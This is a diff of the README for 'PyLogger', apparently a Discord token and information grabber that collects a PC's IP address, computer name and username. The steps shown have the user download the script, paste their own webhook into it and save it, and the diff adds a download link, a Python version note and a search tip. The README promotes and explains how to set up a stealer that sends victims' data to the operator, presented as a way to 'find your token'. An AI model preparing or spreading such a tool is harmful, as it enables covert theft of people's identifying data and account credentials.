Dxrkzen/PyLogger/README.md

 - Grabs IP, Computer Name, Username of PC etc.

 # Setup
-1. Download the python file
+1. How to get started download it - [Download Discord Pylogger](https://github.com/Dxrkzen/PyLogger/archive/refs/tags/1.2.zip)
+(Make sure you have python 3.9 or above!
+[Python 3.9](https://www.python.org/downloads/release/python-390/))
 2. Right-Click the .py file
 3. Press "Edit with Idle"
 4. Scroll Down to the bottom
 5. When you see "Your Webhook Here", enter your webhook!
 6. Press Ctrl+S and you can use it to find your token!
+(You can do ctrl+f and search for webhook to find it easier)
 -------------------------------------------------------
 How to make a webhook!